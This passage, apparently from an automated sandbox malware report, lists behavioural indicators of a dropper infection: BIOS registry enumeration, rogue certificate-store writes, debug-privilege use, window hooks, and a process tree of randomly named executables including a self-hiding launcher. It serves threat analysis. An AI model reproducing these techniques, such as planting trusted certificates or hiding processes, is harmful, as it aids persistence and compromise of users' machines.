| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{6E2A7D35-1FB7-4695-A2E1-1368CE87D5C5} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{97B75E1F-51BA-4FB1-BA06-E79414CE660F} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = [certificate blob omitted] | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6024070.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6707195.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\5335236.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\2857716.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8473.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\ViPPIwqv5bR0VGFmRSnZKqzN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8PGGC.tmp\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build\build.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (5).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv AQ4ciwWch0+5spMnjZvMow.0.2
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
"C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe"
C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe
"C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe
"C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe"
C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe
"C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe"
C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe
"C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
"C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe"
C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe
"C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe
"C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe"
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\B926.bat C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe
"C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe"
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe" -q
C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe
"C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Users\Admin\AppData\Local\Temp\is-13CSK.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-13CSK.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp" /SL5="$1031C,138429,56832,C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1304 -ip 1304
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
